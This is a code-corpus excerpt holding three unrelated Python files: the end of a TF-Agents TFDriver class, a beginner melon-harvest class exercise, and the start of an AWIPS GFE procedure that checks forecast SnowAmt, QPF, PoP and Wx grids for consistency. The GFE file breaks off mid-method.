    When using `max_episodes != None`, a `run` step "finishes" when
    `max_episodes` have been completely collected (hit a boundary).
    When used in conjunction with environments that have variable-length
    episodes, this skews the distribution of collected episodes' lengths:
    short episodes are seen more frequently than long ones.
    As a result, running an `env` of `N > 1` batched environments
    with `max_episodes >= 1` is not the same as running an env with `1`
    environment with `max_episodes >= 1`.

    Args:
      env: A tf_environment.Base environment.
      policy: A tf_policy.TFPolicy policy.
      observers: A list of observers that are notified after every step
        in the environment. Each observer is a callable(trajectory.Trajectory).
      transition_observers: A list of observers that are updated after every
        step in the environment. Each observer is a callable((TimeStep,
        PolicyStep, NextTimeStep)). The transition is shaped just as
        trajectories are for regular observers.
      max_steps: Optional maximum number of steps for each run() call. For
        batched or parallel environments, this is the maximum total number of
        steps summed across all environments. Also see below. Default: 0.
      max_episodes: Optional maximum number of episodes for each run() call. For
        batched or parallel environments, this is the maximum total number of
        episodes summed across all environments. At least one of max_steps or
        max_episodes must be provided. If both are set, run() terminates when at
        least one of the conditions is
        satisfied.  Default: 0.
      disable_tf_function: If True the use of tf.function for the run method is
        disabled.

    Raises:
      ValueError: If both max_steps and max_episodes are None.
    """
    common.check_tf1_allowed()
    # Normalize "not provided" (None) to 0 so validation below is uniform.
    max_steps = max_steps or 0
    max_episodes = max_episodes or 0
    if max_steps < 1 and max_episodes < 1:
      raise ValueError(
          'Either `max_steps` or `max_episodes` should be greater than 0.')
    super(TFDriver, self).__init__(env, policy, observers, transition_observers)
    # 0 means "no limit for this criterion"; store it as +inf so the
    # while-loop comparisons in run() never terminate on that criterion.
    self._max_steps = max_steps or np.inf
    self._max_episodes = max_episodes or np.inf
    if not disable_tf_function:
      # Compile run() into a tf.function; autograph converts the Python
      # while loop below into graph control flow.
      self.run = common.function(self.run, autograph=True)

  def run(  # pytype: disable=signature-mismatch  # overriding-parameter-count-checks
      self, time_step: ts.TimeStep,
      policy_state: types.NestedTensor = ()
  ) -> Tuple[ts.TimeStep, types.NestedTensor]:
    """Run policy in environment given initial time_step and policy_state.

    Args:
      time_step: The initial time_step.
      policy_state: The initial policy_state.

    Returns:
      A tuple (final time_step, final policy_state).
    """
    num_steps = tf.constant(0.0)
    num_episodes = tf.constant(0.0)
    while num_steps < self._max_steps and num_episodes < self._max_episodes:
      # Compute an action using the policy, then step the environment.
      action_step = self.policy.action(time_step, policy_state)
      next_time_step = self.env.step(action_step.action)

      # Package the transition as a trajectory and notify all observers.
      traj = trajectory.from_transition(time_step, action_step, next_time_step)
      for observer in self._transition_observers:
        observer((time_step, action_step, next_time_step))
      for observer in self.observers:
        observer(traj)

      # Boundary trajectories mark episode ends and count toward
      # max_episodes; every non-boundary step counts toward max_steps.
      num_episodes += tf.math.reduce_sum(
          tf.cast(traj.is_boundary(), tf.float32))
      num_steps += tf.math.reduce_sum(tf.cast(~traj.is_boundary(), tf.float32))

      time_step = next_time_step
      policy_state = action_step.state
    return time_step, policy_state
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
9e25a76b082548ee94432dc821353a29a8e5f423 | 107973063f26b791ccd6deca0026acb338eb4d6b | /harvest.py | 8631b158987a039be018791b790f53b2a123623b | [] | no_license | sonya-sa/melon-objects | 322b46138ee9287b74cf8eb50bae64f56eb50e23 | a035db0be16e749a0654cc8518315f408efc72bc | refs/heads/master | 2020-03-10T10:15:07.606336 | 2018-04-13T01:09:39 | 2018-04-13T01:09:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,986 | py | ############
# Part 1 #
############
class MelonType(object):
    """A species of melon at a melon farm."""

    def __init__(self, code, first_harvest, color, is_seedless, is_bestseller, name):
        """Record the reporting details for one melon species."""
        self.code = code
        self.first_harvest = first_harvest
        self.color = color
        self.is_seedless = is_seedless
        self.is_bestseller = is_bestseller
        self.name = name
        # Food pairings start empty; populate via add_pairing().
        self.pairings = []

    def add_pairing(self, pairing):
        """Append each food in *pairing* (a list) to this type's pairings."""
        for food in pairing:
            self.pairings.append(food)

    def update_code(self, new_code):
        """Overwrite the reporting code with *new_code*."""
        self.code = new_code
def make_melon_types():
    """Returns a list of the current melon types."""
    # (code, first_harvest, color, is_seedless, is_bestseller, name, pairings)
    specs = [
        ('musk', 1998, 'green', True, True, 'Muskmelon', ['mint']),
        ('cas', 2003, 'orange', True, False, 'Casaba', ['mint', 'strawberries']),
        ('cren', 1996, 'green', True, False, 'Crenshaw', ['proscuitto']),
        ('yw', 2013, 'yellow', True, True, 'Yellow Watermelon', ['ice cream']),
    ]

    all_melon_types = []
    for code, first, color, seedless, best, name, pairings in specs:
        melon_type = MelonType(code, first, color, seedless, best, name)
        melon_type.add_pairing(pairings)
        all_melon_types.append(melon_type)
    return all_melon_types
def print_pairing_info(melon_types):
    """Prints information about each melon type's pairings."""
    # PORTABILITY FIX: the original used Python-2-only print statements.
    # Single-argument print(...) behaves identically under Python 2 and 3.
    for melon_type in melon_types:
        print("{} pairs well with".format(melon_type.name))
        for pairing in melon_type.pairings:
            print("- {}".format(pairing))
        # Blank line between melon types.
        print("")
def make_melon_type_lookup(melon_types):
    """Takes a list of MelonTypes and returns a dictionary of melon type by code."""
    return {melon_type.code: melon_type for melon_type in melon_types}
############
# Part 2 #
############
# all_melon_types = make_melon_types()
# make_melon
class Melon(object):
    """A melon in a melon harvest."""

    # Class-level cache of {code: MelonType}, built on first use.
    # BUG FIX: the original assigned `self.all_melon_types = ...` directly in
    # the class body, which raises NameError because `self` only exists
    # inside methods.
    _melon_types_by_code = None

    @classmethod
    def _melon_type_lookup(cls):
        """Return (building on first call) the shared code -> MelonType map."""
        if cls._melon_types_by_code is None:
            cls._melon_types_by_code = make_melon_type_lookup(make_melon_types())
        return cls._melon_types_by_code

    def __init__(self, melon_code, shape_rating, color_rating, from_field, harvested_by):
        """Record one harvested melon's type, ratings and provenance."""
        self.all_melon_types = self._melon_type_lookup()
        self.melon_type = self.all_melon_types[melon_code]
        self.shape_rating = shape_rating
        self.color_rating = color_rating
        self.from_field = from_field
        self.harvested_by = harvested_by

    def is_sellable(self):
        """True if both ratings are at least 5 and the melon is not from field 3.

        BUG FIX: the original signature omitted `self`, so calling
        melon.is_sellable() raised TypeError.
        """
        return (self.from_field != 3 and
                self.shape_rating >= 5 and
                self.color_rating >= 5)
def make_melons(melon_types):
    """Returns a list of Melon objects."""
    # (melon_code, shape_rating, color_rating, from_field, harvested_by)
    # Note: 'Shei1a' (with a digit one) is intentionally preserved as-is.
    harvest_data = [
        ('yw', 8, 7, 2, 'Sheila'),
        ('yw', 3, 4, 2, 'Shei1a'),
        ('yw', 9, 8, 3, 'Sheila'),
        ('cas', 10, 6, 35, 'Sheila'),
        ('cren', 8, 9, 35, 'Michael'),
        ('cren', 8, 2, 35, 'Michael'),
        ('cren', 6, 7, 4, 'Michael'),
        ('musk', 6, 7, 4, 'Michael'),
        ('yw', 7, 10, 3, 'Sheila'),
    ]
    return [Melon(code, shape, color, field, picker)
            for code, shape, color, field, picker in harvest_data]
def get_sellability_report(melons):
    """Given a list of melon objects, prints whether each one is sellable."""
    # Implements the previously-empty stub: one line per melon, with its
    # harvester, field and a sellability tag.
    for melon in melons:
        if melon.is_sellable():
            status = "(CAN BE SOLD)"
        else:
            status = "(NOT SELLABLE)"
        print("Harvested by {} from Field {} {}".format(
            melon.harvested_by, melon.from_field, status))
| [
"no-reply@hackbrightacademy.com"
] | no-reply@hackbrightacademy.com |
5c8494e379adb3963beead9dc40e803a8116cb46 | 3de3dae722829727edfdd6cc3b67443a69043475 | /cave/com.raytheon.viz.gfe/localization/gfe/userPython/procedures/SnowAmtQPFPoPWxCheck.py | 9d7c3a3c8577a8c463d088e2adc2ec0c09f4fe61 | [
"LicenseRef-scancode-public-domain",
"Apache-2.0"
] | permissive | Unidata/awips2 | 9aee5b7ec42c2c0a2fa4d877cb7e0b399db74acb | d76c9f96e6bb06f7239c563203f226e6a6fffeef | refs/heads/unidata_18.2.1 | 2023-08-18T13:00:15.110785 | 2023-08-09T06:06:06 | 2023-08-09T06:06:06 | 19,332,079 | 161 | 75 | NOASSERTION | 2023-09-13T19:06:40 | 2014-05-01T00:59:04 | Java | UTF-8 | Python | false | false | 61,851 | py | ##
# This software was developed and / or modified by Raytheon Company,
# pursuant to Contract DG133W-05-CQ-1067 with the US Government.
#
# U.S. EXPORT CONTROLLED TECHNICAL DATA
# This software product contains export-restricted data whose
# export/transfer/disclosure is restricted by U.S. law. Dissemination
# to non-U.S. persons whether in the United States or abroad requires
# an export license or other authorization.
#
# Contractor Name: Raytheon Company
# Contractor Address: 6825 Pine Street, Suite 340
# Mail Stop B8
# Omaha, NE 68106
# 402.291.0100
#
# See the AWIPS II Master Rights File ("Master Rights File.pdf") for
# further licensing information.
##
#----------------------------------------------------------------------------
# This software is in the public domain, furnished "as is", without technical
# support, and with no warranty, express or implied, as to its usefulness for
# any purpose.
#
# SnowAmtQPFPoPWxCheck
#
# Author: Jay Smith, WFO Fairbanks, jay.smith@noaa.gov, 907-458-3721
# Version: 1.0.0, 09/14/2006 - Initial version
# 1.0.1, 10/12/2006 - Added PoP/QPF check at request of DSPAC
# 1.0.2, 10/18/2006 - Changed PoP/QPF check to treat the PoP as
# floating. Instead of checking each individual PoP grid
# against its corresponding QPF grid, the max of all the
# PoP grids overlapping a QPF grid will be checked.
# 1.1.0, 01/25/2007 - Added options to choose which checks to run.
# Reorganized code so that each check is its own method.
# Added a check for QPF and Wx. Added highlighting for the
# created temporary grids.
# 1.1.1, 02/01/2007 - Changed the SnowAmt/Wx check to return
# consistent results for SnowAmt > 0 and Wx grid containing
# S, SW, or IP regardless of whether the frozen precip is
# mixed with freezing and/or liquid precip.
# 1.2.0, 02/13/2007 - Added a configuration option to provide a CWA
# edit area to run the procedure over. A bad edit area or no
# edit area will result in running over the whole domain.
# Modified the SnowAmt/Wx and QPF/Wx checks to handle two
# cases. Case 1: The SnowAmt/QPF grid is 6-hr long and starts
# at 00, 06, 12, or 18 UTC. Then only one of the corresponding
# Wx grids has to meet the consistency rule. Case 2: The
# SnowAmt/QPF grid does not meet the case 1 definition. Then
# all of the corresponding Wx grids must meet the consistency
# rule.
# The procedure performs the following checks:
# 1. If SnowAmt present and >= 0.5 inches, then corresponding QPF grids
# must add up to 0.01 inches.
# 2. If SnowAmt >= 0.1 inches, then there are two cases:
# a. If the SnowAmt grid is exactly 6 hours long and starts at 00, 06, 12,
# or 18 UTC, then at least one of the corresponding Wx grids must have
# S, SW, or IP.
# b. If the SnowAmt grid does not adhere to the time constraints listed in
# in the previous paragraph, then all of the corresponding Wx grids
# must have S, SW, or IP. This more stringent test is required because
# with grids offset from the NDFD time constraints, it's possible for
# the GFE to evaluate the grids as consistent using an "any"
# criteria but have the NDFD flag those same grids as inconsistent.
# 3. If QPF > 0, then at least one of the corresponding PoP grids must be > 0
# 4. If QPF > 0, then there are two cases:
# a. If the QPF grid is exactly 6 hours long and starts at 00, 06, 12, or 18
# UTC, then at least one of the corresponding Wx grids must have R, RW,
# S, SW, RS, IP, L, ZR, ZL.
# b. If the QPF grid does not adhere to the time constraints listed in the
# previous paragraph, then all corresponding Wx grids must contain a
# precipitating weather type. This more stringent test is required
# because with grids offset from the NDFD time constraints, it's
# possible for the GFE to evaluate grids as consistent using an "any"
# criteria but have the NDFD flag those same grids as inconsistent.
# For all of the checks above, if the initial threshold is not exceeded, then
# the two grids are consistent by definition. In other words:
# 1. If SnowAmt < 0.5, then SnowAmt and QPF are always consistent.
# 2. If SnowAmt < 0.1, then SnowAmt and Wx are always consistent.
# 3. If QPF = 0, then QPF and PoP are always consistent.
# 4. If QPF = 0, then QPF and Wx are always consistent.
# For the Wx checks above, only the Wx type is considered.
#
# ****** NOTE NOTE NOTE NOTE ******
# At this time, the check for two 6-hour QPF grids vs. one 12-hr PoP grid
# is not implemented because neither of those grid definitions is implemented
# in the GFE baseline. I don't know how to do a check on grids that don't
# exist.
# ****** NOTE NOTE NOTE NOTE ******
#
# If discrepancies are found, then the "bad" grids will be highlighted.
# Temporary grids showing where the discrepancies occur will be created and
# also highlighted.
#
# Dealing with QPF and SnowAmt is always a pain, because they are "cumulative"
# elements. This procedure will account for the possibility that the SnowAmt and
# QPF grids are not the same duration. It will also account for the possibility
# that the SnowAmt and QPF grids are not aligned on either or both ends.
# The only sane way to handle either situation is to believe that the QPF
# accumulation happens uniformly across the grid's duration and to use
# the proportional amount of the QPF that corresponds the SnowAmt grid's
# duration. Some examples:
# 1. The QPF grid is 3 hours long and there are 3, 1-hour, SnowAmt grids.
# Each SnowAmt grid will be compared to 1/3 the value of the QPF grid.
# 2. The last two hours of a 3-hour QPF grid overlaps a 2-hour SnowAmt grid.
# The SnowAmt grid will be compared to 2/3 the value of the QPF grid.
# 3. Two 3-hour QPF grids align with one 6-hour SnowAmt grid. The first QPF
# grid will be compared to the SnowAmt grid. If the consistency check passes
# on that comparison, the program will continue. If the consistency check
# fails, then the sum of the two QPF grids will be compared to the SnowAmt
# grid.
# 4. The last four hours of a 6-hour QPF grid and the first two hours of a
# 3-hour QPF grid overlap a 6-hour SnowAmt grid. The SnowAmt grid will be
# compared to 2/3 of the first QPF grid. If the consistency check passes,
# the program will continue. If the consistency check fails, then 2/3 of the
# first QPF grid will be added to 2/3 of the second QPF grid and that QPF
# sum will be compared against the SnowAmt grid.
#
# Confused yet? Of course, all of these gyrations can be avoided if the
# QPF and SnowAmt grids are aligned and of the same duration.
#
# Unfortunately, the GFE does not provide a way to deal with proportional
# amounts of the accumulative grids, so I have done this.
#
# I've written this code such that it's optimized to minimize memory usage
# (at least I think I've done that). As a result, it's not particularly
# optimized for ifpServer database access. In fact, I retrieve the various
# grids from the ifpServer database many times during the procedure's run.
# This will have an impact on how fast the procedure runs (it'll run slower
# than if I had optimized for ifpServer database access). The choice to favor
# memory optimization comes from my belief that there are still "memory leak"
# problems in the GFE and that the consequences of those problems will be most
# manifest when this procedure is most likely to be run (near the end of the
# shift). Funky memory problems are a prime cause of funky application
# behavior like application crashes or spontaneous logouts. So, this procedure
# basically reads a grid into memory, keeps it as long as it's needed, and
# then discards it.
#
# Finally, this procedure is also intended to provide an example to other
# developers of how to write and document code. I have reservations as to how
# well I've succeeded at that task. The code is heavily documented, probably
# excessively so. Also, it's not as well as organized as it could be. As you
# look through the various methods, it should become quickly apparent that
# there is a lot of repeated code. I've consciously left the code this way in
# the hopes that it will be easier to understand by more novice programmers
# and because the code hasn't quite grown to the point where updating the
# repeating code is onerous or overly error-prone. It would be better to
# capture the repeating code in separate methods, but keeping track of the
# where you are in the code becomes harder the more you have to jump around
# from method to method. As with all things, there are trade-offs involved.
# ----------------------------------------------------------------------------
##
# This is an absolute override file, indicating that a higher priority version
# of the file will completely replace a lower priority version of the file.
##
MenuItems = ["Consistency"]

# GUI options presented to the forecaster when the procedure is launched.
VariableList = []
VariableList.append(('Check_Cleanup', 'Check', 'radio', ['Check', 'Cleanup']))
VariableList.append(('Run SnowAmt/QPF Check?', ['Yes'], 'check', ['Yes']))
VariableList.append(('Run SnowAmt/Wx Check?', ['Yes'], 'check', ['Yes']))
VariableList.append(('Run QPF/PoP Check?', ['Yes'], 'check', ['Yes']))
VariableList.append(('Run QPF/Wx Check?', ['Yes'], 'check', ['Yes']))
VariableList.append(('If "Cleanup" is selected, then only cleanup actions will run.\nNo checks will be made, regardless of the above settings.', '', 'label'))

#### Config section
# Both the QPF and SnowAmt grids have values which are floating point
# numbers. This means comparisons must use a tolerance value. In other
# words, 0.5 may be represented in machine numbers as 0.49999999999 or
# 0.500000000001. By specifying a tolerance value, we account for the
# vagaries of machine representation of floating point numbers while
# keeping the precision of the comparisons to acceptable levels. Depending
# on the comparison being done, the tolerance value will be added to or
# subtracted from the comparison value to allow for machine error in the
# floating point number representation.
# By default in the GFE, QPF precision is to the nearest one-hundredth while
# SnowAmt precision is to the nearest tenth.
qpfTol = 0.00001  # 1/100,000 tolerance vs 1/100 precision
snowAmtTol = 0.0001  # 1/10,000 tolerance vs 1/10 precision
# Inconsistent grid highlight color. One size fits all. To turn off
# highlighting, set the variable to the empty string, ''.
inconGridColor = 'red'
# Temporary grid highlight color. One size fits all. To turn off highlighting,
# set the variable to the empty string, ''.
tempGridColor = 'orange'
# Name of CWA edit area to use instead of running the procedure over the
# whole domain. Set to the empty string, '', if you want the procedure to
# always run over the whole domain. If the procedure has a problem with the
# edit area you provide, it will run over the whole domain. You should probably
# choose an edit area that is slightly larger than your entire CWA. It's
# possible that when mapping your GFE grids to NDFD grids that the NDFD thinks
# some GFE grid cells are in your CWA that the GFE does not think are in your
# CWA. Using an edit area slightly larger than the CWA, like the ISC_Send_Area
# which is the mask used when sending grids to the NDFD, should eliminate the
# possibility of the NDFD intermittently flagging CWA border "points" as
# inconsistent. Note: running the procedure over a subset of the entire GFE
# domain does not really provide any performance gains. Given the way the
# underlying array data structure works, calculations are almost always made
# at every single grid point first and then a mask is applied to limit the
# meaningful results to the edit area. For the purposes of this procedure, the
# values outside the edit area are set to the appropriate "consistent" result.
# The real benefit of this option is it limits the inconsistent results to the
# areas the forecaster really cares about, which should lessen the workload of
# using this procedure. Marine Offices: Make sure the edit area provided
# includes your marine zones.
cwaEditArea = 'ISC_Send_Area'
#### Config section end
import SmartScript
from numpy import *
class Procedure (SmartScript.SmartScript):
    def __init__(self, dbss):
        # Standard GFE procedure boilerplate: pass the dbss handle the GFE
        # supplies straight through to the SmartScript base class.
        SmartScript.SmartScript.__init__(self, dbss)
def __cleanup(self, timeRange):
# Remove any temporary grids created previously.
for element in (
'SnowAmtQPFInconsistent', 'SnowAmtWxInconsistent',
'QPFPoPInconsistent', 'QPFWxInconsistent'):
try:
# From SmartScript
self.unloadWE('Fcst', element, 'SFC')
except:
# A failure is almost certainly no grids to unload.
pass
# Turn off any highlights. From SmartScript
self.highlightGrids('Fcst', 'SnowAmt', 'SFC', timeRange, inconGridColor, on=0)
self.highlightGrids('Fcst', 'QPF', 'SFC', timeRange, inconGridColor, on=0)
self.highlightGrids('Fcst', 'Wx', 'SFC', timeRange, inconGridColor, on=0)
self.highlightGrids('Fcst', 'PoP', 'SFC', timeRange, inconGridColor, on=0)
return
def __checkConfigValueTypes(self):
import types
message = ''
badValues = False
if not type(inconGridColor) is types.StringType:
message = '%sThe "inconGridColor" variable is not defined as a string value. Please contact your IFPS focal point to fix this problem.\n' % message
badValues = True
if not type(tempGridColor) is types.StringType:
message = '%sThe "tempGridColor" variable is not defined as a string value. Please contact your IFPS focal point to fix this problem.\n' % message
badValues = True
if not type(cwaEditArea) is types.StringType:
message = '%sThe "cwaEditArea" variable is not defined as a string value. Please contact your IFPS focal point to fix this problem.\n' % message
badValues = True
if badValues:
message = '%sYou will not be able to run the procedure until the problem is corrected.' % message
# The next two commands are from SmartScript
self.statusBarMsg(message, 'U')
self.cancel()
return
    def _runSnowAmtQPFCheck(self, timeRange):
        """Flag points where SnowAmt >= 0.5 but overlapping QPF totals < 0.01.

        For each SnowAmt grid in timeRange, the overlapping QPF grids are
        summed, each pro-rated by the fraction of the QPF grid that
        actually overlaps the SnowAmt grid. Failing points (inside the
        CWA mask) are captured in a temporary 'SnowAmtQPFInconsistent'
        grid, the offending grids are highlighted, and self.inconsistent
        is set True.
        """
        # This method implements the check that if SnowAmt >= 0.5, then
        # QPF must be >= 0.01.
        # There can be a significant difference between the values stored
        # in memory and the values returned from the database. This is because
        # when values are saved, the element's precision (as defined in
        # serverConfig.py/localConfig.py) is enforced. Values in memory do not
        # have the element's precision enforced; in fact, they have the
        # machine precision of the underlying data type.
        # If there are locks, post an urgent message and return from the method.
        message = ''
        # lockedByMe is from SmartScript
        if self.lockedByMe('QPF', 'SFC'):
            message = '%sYou have the QPF grid locked. Please save the QPF grid.\n' % message
        if self.lockedByMe('SnowAmt', 'SFC'):
            message = '%sYou have the SnowAmt grid locked. Please save the SnowAmt grid.\n' % message
        # lockedByOther is from SmartScript
        if self.lockedByOther('QPF', 'SFC'):
            message = '%sThe QPF grid is locked by someone else. Please have that person save the QPF grid.\n' % message
        if self.lockedByOther('SnowAmt', 'SFC'):
            message = '%sThe SnowAmt grid is locked by someone else. Please have that person save the SnowAmt grid.\n' % message
        if message:
            message = '%sThe SnowAmt/QPF Check was not run.' % message
            self.statusBarMsg(message, 'U')
            # I return instead of aborting because the user may have asked for
            # other tests that do not have locked grid problems.
            return
        # Make sure there are actually SnowAmt grids in the time range.
        # getGridInfo (from SmartScript) returns an empty list when there
        # are no grids in the time range. If no SnowAmt grids are found,
        # post an urgent message and return from the method.
        snowAmtInfoList = self.getGridInfo('Fcst', 'SnowAmt', 'SFC', timeRange)
        if [] == snowAmtInfoList:
            message = 'There are no SnowAmt grids in the time range you selected.\nThe SnowAmt/QPF Check did not run.'
            self.statusBarMsg(message, 'U')
            # I return instead of aborting because the user may have asked for
            # other tests that do not have missing grid problems.
            return
        # The cache=0 switch on the self.getGrids calls prevents the GFE
        # from holding the grids in its cache, keeping the memory
        # footprint of the procedure down.
        # The Python builtin command enumerate loops over an iterable object
        # and returns a 2-tuple containing the current index of the
        # iteration and the object at that index. In cases where I need
        # both the index and the object, I think this construct is more
        # elegant than:
        # for i in xrange(len(iterableObject)):
        #     object = iterableObject[i]
        snowAmtGrids = self.getGrids('Fcst', 'SnowAmt', 'SFC',
            timeRange, mode='List', noDataError=0,cache=0)
        for snowAmtIndex, snowAmtGrid in enumerate(snowAmtGrids):
            # greater_equal is from Numeric. For the given array and
            # threshold, a new array of the same dimensions as the input
            # array is returned. The new array has the value 1 where the
            # input array was greater than or equal to the threshold and
            # has the value 0 elsewhere. snowAmtTol allows for the
            # element's database precision.
            halfInchMask = greater_equal(snowAmtGrid, 0.5 - snowAmtTol)
            gridTR = snowAmtInfoList[snowAmtIndex].gridTime()
            # Accumulator for the pro-rated QPF overlapping this SnowAmt
            # grid; self.empty() returns an all-zero grid.
            qpfSum = self.empty()
            qpfGrids = self.getGrids(
                'Fcst', 'QPF', 'SFC', gridTR, mode='List', noDataError=0,
                cache=0)
            if qpfGrids is None:
                message = '''There are no QPF grids in time range %s.
The SnowAmt/QPF Check skipped the time range.''' % gridTR
                self.statusBarMsg(message, 'U')
                continue
            qpfInfoList = self.getGridInfo('Fcst', 'QPF', 'SFC', gridTR)
            for qpfIndex, qpfGrid in enumerate(qpfGrids):
                snowAmtGridStartTime = gridTR.startTime().unixTime()
                qpfGridTR = qpfInfoList[qpfIndex].gridTime()
                qpfGridStartTime = qpfGridTR.startTime().unixTime()
                # fraction is the portion of this QPF grid that overlaps
                # the SnowAmt grid; partial overlaps are pro-rated.
                fraction = 1.0
                if qpfGridStartTime < snowAmtGridStartTime:
                    diff = snowAmtGridStartTime - qpfGridStartTime
                    fraction -= (float(diff) / qpfGridTR.duration())
                snowAmtGridEndTime = gridTR.endTime().unixTime()
                qpfGridEndTime = qpfGridTR.endTime().unixTime()
                if qpfGridEndTime > snowAmtGridEndTime:
                    diff = qpfGridEndTime - snowAmtGridEndTime
                    fraction -= (float(diff) / qpfGridTR.duration())
                # For some reason, the construct:
                # qpfSum = qpfSum + (qpfGrid * fraction)
                # doesn't assign the expression evaluation back to qpfSum.
                # Thus, I use a temporary variable.
                qpfTemp = qpfSum + (qpfGrid * fraction)
                qpfSum = qpfTemp
                del qpfTemp
                # less is from Numeric. It behaves analogously to
                # greater_equal, described above. qpfTol allows for the
                # element's database precision.
                qpfMask = less(qpfSum, 0.01 + qpfTol)
                # The following is the "truth" table for the logical
                # comparison.
                # SnowAmt >= 0.5, 1; SnowAmt < 0.5, 0
                # QPF < 0.01, 1; QPF >= 0.01, 0
                # SnowAmt >= 0.5 (1) and QPF < 0.01 (1) = 1 (Bad result)
                # SnowAmt >= 0.5 (1) and QPF >= 0.01 (0) = 0 (Good result)
                # SnowAmt < 0.5 (0) and QPF < 0.01 (1) = 0 (Good result)
                # SnowAmt < 0.5 (0) and QPF >= 0.01 (0) = 0 (Good result)
                # logical_and is from Numeric
                consistMask = logical_and(halfInchMask, qpfMask)
                # Now, apply the CWA mask: force the "good" value (0)
                # everywhere outside self.cwaMask so only points inside
                # the configured edit area can be flagged. There's an
                # assumption here that all offices will use a mask and
                # provide a valid one; if not, the next statement doesn't
                # actually change anything.
                consistMask[logical_not(self.cwaMask)] = 0
                # ravel and sometrue are from Numeric.
                if not sometrue(ravel(consistMask)):
                    # This is the good result, even though it may not be
                    # intuitive. The ravel function reduces the rank of the
                    # array by one. Since we had a 2-d array, the ravel
                    # function creates a 1-d array (a vector) such that
                    # reading the 2-d array from left-to-right, top-to-
                    # bottom returns the same values as reading the 1-d
                    # array from left-to-right. The sometrue function
                    # performs a logical or on subsequent element pairs
                    # in the 1-d array and returns the final result. If
                    # there's no inconsistency, the result will be 0.
                    # Thus, negating the sometrue result gives us the
                    # positive outcome. Phew.
                    # Since QPF is an accumulative element, we don't need
                    # to continue the loop once the QPF sum meets the
                    # threshold.
                    break
            else:
                # This block will only execute if the for loop runs to
                # completion, i.e., the break statement is not executed.
                # So, if we get here, we have an inconsistency and need to
                # highlight the appropriate grids.
                if inconGridColor:
                    self.highlightGrids(
                        'Fcst', 'SnowAmt', 'SFC', gridTR, inconGridColor)
                    self.highlightGrids(
                        'Fcst', 'QPF', 'SFC', gridTR, inconGridColor)
                # createGrid is from SmartScript
                # Since this block of code only executes if the for loop
                # runs to completion, then the value of consistMask from
                # the for loop will contain all of the inconsistencies.
                self.createGrid(
                    'Fcst', 'SnowAmtQPFInconsistent', 'SCALAR', consistMask,
                    gridTR, descriptiveName='SnowAmtQPFInconsistent',
                    minAllowedValue=0, maxAllowedValue=1, units='Good/Bad')
                if tempGridColor:
                    self.highlightGrids(
                        'Fcst', 'SnowAmtQPFInconsistent', 'SFC', gridTR,
                        tempGridColor)
                self.inconsistent = True
        # While not required, I like to terminate my methods with a return
        # statement to make it clear this is where the method ends.
        return
    def _runSnowAmtWxCheck(self, timeRange):
        """Check that wherever SnowAmt >= 0.1 the Wx grids contain S, SW or IP.

        Only the Wx type is examined -- coverage/probability and intensity
        are ignored. Depending on the SnowAmt grid's duration and start
        time, either one overlapping Wx grid (locked case) or every
        overlapping Wx grid (unlocked case) must be consistent; the actual
        comparisons are delegated to _snowAmtWxCheckLocked /
        _snowAmtWxCheckUnlocked.
        """
        # This implements the check that if SnowAmt >= 0.1, then the Wx grid
        # must contain S, SW, or IP, regardless of whether or not there is
        # any freezing or liquid types. Finally, the check does not look at
        # anything other than the Wx type. In other words, the check will be
        # okay if SnowAmt != 0 and Wx has Chc:S:- or Def:SW:-- or Lkly:S:+.
        # There can be a significant difference between the values stored
        # in memory and the values returned from the database. This is because
        # when values are saved, the element's precision (as defined in
        # serverConfig.py/localConfig.py) is enforced. Values in memory do not
        # have the element's precision enforced; in fact, they have the
        # machine precision of the underlying data type.
        # If there are locks, post an urgent message and return from the method.
        message = ''
        # lockedByMe is from SmartScript
        if self.lockedByMe('Wx', 'SFC'):
            message = '%sYou have the Wx grid locked. Please save the Wx grid.\n' % message
        if self.lockedByMe('SnowAmt', 'SFC'):
            message = '%sYou have the SnowAmt grid locked. Please save the SnowAmt grid.\n' % message
        # lockedByOther is from SmartScript
        if self.lockedByOther('Wx', 'SFC'):
            message = '%sThe Wx grid is locked by someone else. Please have that person save the Wx grid.\n' % message
        if self.lockedByOther('SnowAmt', 'SFC'):
            message = '%sThe SnowAmt grid is locked by someone else. Please have that person save the SnowAmt grid.\n' % message
        if message:
            message = '%sThe SnowAmt/Wx Check was not run.' % message
            self.statusBarMsg(message, 'U')
            # I return instead of aborting because the user may have asked for
            # other tests that do not have locked grid problems.
            return
        # Make sure there are actually SnowAmt grids in the time range.
        # getGridInfo (from SmartScript) returns an empty list when there
        # are no grids in the time range. If no SnowAmt grids are found,
        # post an urgent message and return from the method.
        snowAmtInfoList = self.getGridInfo('Fcst', 'SnowAmt', 'SFC', timeRange)
        if [] == snowAmtInfoList:
            message = 'There are no SnowAmt grids in the time range you selected.\nThe SnowAmt/Wx Check did not run.'
            self.statusBarMsg(message, 'U')
            # I return instead of aborting because the user may have asked for
            # other tests that do not have missing grid problems.
            return
        snowAmtGrids = self.getGrids(
            'Fcst', 'SnowAmt', 'SFC', timeRange, mode='List', noDataError=0,
            cache=0)
        for snowAmtIndex, snowAmtGrid in enumerate(snowAmtGrids):
            # Mask of points with "significant" snow; snowAmtTol allows
            # for the element's database precision.
            nonZeroMask = greater_equal(snowAmtGrid, 0.1 - snowAmtTol)
            gridTR = snowAmtInfoList[snowAmtIndex].gridTime()
            wxInfoList = self.getGridInfo('Fcst', 'Wx', 'SFC', gridTR)
            if [] == wxInfoList:
                message = '''There are no Wx grids in time range %s.
The SnowAmt/Wx Check skipped the time range.''' % gridTR
                self.statusBarMsg(message, 'U')
                continue
            # There are two cases, which I'll capture in individual methods
            # If the SnowAmt grid is exactly 6 hours long and starts at
            # 00, 06, 12, or 18 UTC, then only one overlapping Wx grid needs
            # to match. Otherwise, all overlapping Wx grids need to match.
            if gridTR.duration() / 3600 == 6 and \
               gridTR.startTime().hour in (0, 6, 12, 18):
                self._snowAmtWxCheckLocked(nonZeroMask, gridTR, wxInfoList)
            else:
                self._snowAmtWxCheckUnlocked(nonZeroMask, gridTR, wxInfoList)
        return
    def _snowAmtWxCheckLocked(self, nonZeroMask, gridTR, wxInfoList):
        """SnowAmt/Wx consistency for a "locked" SnowAmt grid.

        "Locked" means the SnowAmt grid is exactly 6 hours long and starts
        at 00, 06, 12 or 18 UTC; in that case only ONE overlapping Wx grid
        needs a snow type (S, SW or IP) wherever nonZeroMask is set. If
        none qualifies, temporary 'SnowAmtWxInconsistent' grids are
        created (clipped to the SnowAmt grid's time range), the offending
        grids highlighted, and self.inconsistent set True.
        """
        # The "Locked" comes from the idea that if the SnowAmt grid meets
